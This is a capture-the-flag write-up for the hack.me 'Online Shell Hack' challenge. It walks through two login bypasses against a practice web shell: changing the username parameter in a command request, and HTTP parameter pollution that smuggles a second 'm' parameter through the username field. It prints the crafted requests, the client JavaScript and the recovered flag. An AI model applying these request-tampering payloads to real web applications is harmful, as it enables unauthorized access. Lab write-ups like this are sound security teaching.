[Challenge]: Online Shell Hack @hack.me

Challenge: Online Shell Hack
Author: TT22
Website: hack.me
Link: https://hack.me/103164/online-shell-hack.html
Description: Try logging in as “admin” by misleading the authentication system and then capture the flag.

Solution 1:

When the challenge starts, it presents this message on top of the page: Try to log in as “admin”. Guest user is “guest” with empty password.
Following this message, I try to log in using guest user. The log in works but when I execute the “ls” command I receive the message: Error: This command is disabled for user “guest”.
Below the HTTP GET requests made by javascript using guest account:
[Login – Username]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=login&l=guest
[Login – Password]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=password&l=guest&p=
[Command – ls]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=prompt&l=guest&s=084e0343a0486ff05530df6c705c8bb4&c=ls
With the last request, I receive the error message: Error: This command is disabled for user “guest”.

As you can see, there are more than one parameters per request:

  • m: indicates the method: login, password, prompt
  • l: indicates the username
  • p: indicates the password
  • s: indicates the session id
  • c: indicates the command

To bypass the restriction on guest user I manipulate the request by changing only the username:

[Command – ls with admin username]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=prompt&l=admin&s=084e0343a0486ff05530df6c705c8bb4&c=ls

The output is:
#error_log_out#Error: Wrong session key for user “guest”.
Logged out.

total 0
-rwxrwxrwx 1 admin admin 21 may 1 22:45 flag.txt

prompt>

Great! Now I can see the flag.txt file and I can try read its content simply by using the Linux’s cat command.

[Command – cat flag.txt with admin username]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=prompt&l=admin&s=084e0343a0486ff05530df6c705c8bb4&c=cat%20flag.txt

The next output is:
#error_log_out#Error: Wrong session key for user “guest”.
Logged out.

i0EJKrsgbhQOKscwyNXL

prompt>

i0EJKrsgbhQOKscwyNXL is the flag!

Solution 2:

The second solution uses the HPP(HTTP Parameter Pollution). With this technique, I can manipulate the CGI parameter to bypass the login.
For first, I use the “admin&m=login” payload for the l parameter:

[Login – Username]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=login&l=admin&m=login

As you can see the “m” parameter is written twice.

Below the function that validates the username:

function enterLogin(input) {
if (getHTTP(“request.php?m=login&l=”+input) == “ok”) {
login = input; // Saves the login
currentTerminalFunction = enterPassword; // Set the next function
terminalInPasswordMode = true; // Indicate that the user will type a password
terminalPrint(“Enter your password: “);
} else {
terminalPrint(“<span style=\”color:#FE0000;\”>Error: This login does not exists!</span><br /><br />Please enter your login: “);
}
}

The if (getHTTP(“request.php?m=login&l=”+input) == “ok”) condition returns always true because the username declared with l parameter(admin) exists. After this check, the “login” variable will contains “admin&m=login”. The login variable will be used to validate the password; for this reason I use an empty password during the login process.

[Login – Password]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=password&l=admin&m=login&p=

Using the HPP, the “m” parameter is declared double time; the web application will process the last declaration: m=login.

Below the function that validates the password:

function enterPassword(input) {
terminalInPasswordMode = false;
var resp = getHTTP(“request.php?m=password&l=”+login+”&p=”+input);
if (resp !== “error”) {
sessionKey = resp;
terminalPrint(“Logged in.<br />Type \”logout\” or \”exit\” to disconnect.<br /><br />prompt>”);
currentTerminalFunction = prompt;
} else {
terminalPrint(“<span style=\”color:#FE0000;\”>Error: Wrong password!</span><br /><br />Please enter your login: “);
currentTerminalFunction = enterLogin;
}
}

The last request returns always “ok”, then, the if (resp !== “error”) condition is always true.

The last step, execute the cat command:
[Command – cat flag.txt with admin username]:
http://s66354-103164-yv2.croto.hack.me/request.php?m=prompt&l=admin&m=login&s=ok&c=cat%20flag.txt&m=prompt&s=123123

The HPP helps me another time, I override the m and s parameters with fake session ID. Below the result:

#error_log_out#Error: Wrong session key for user “guest”.
Logged out.

i0EJKrsgbhQOKscwyNXL

prompt>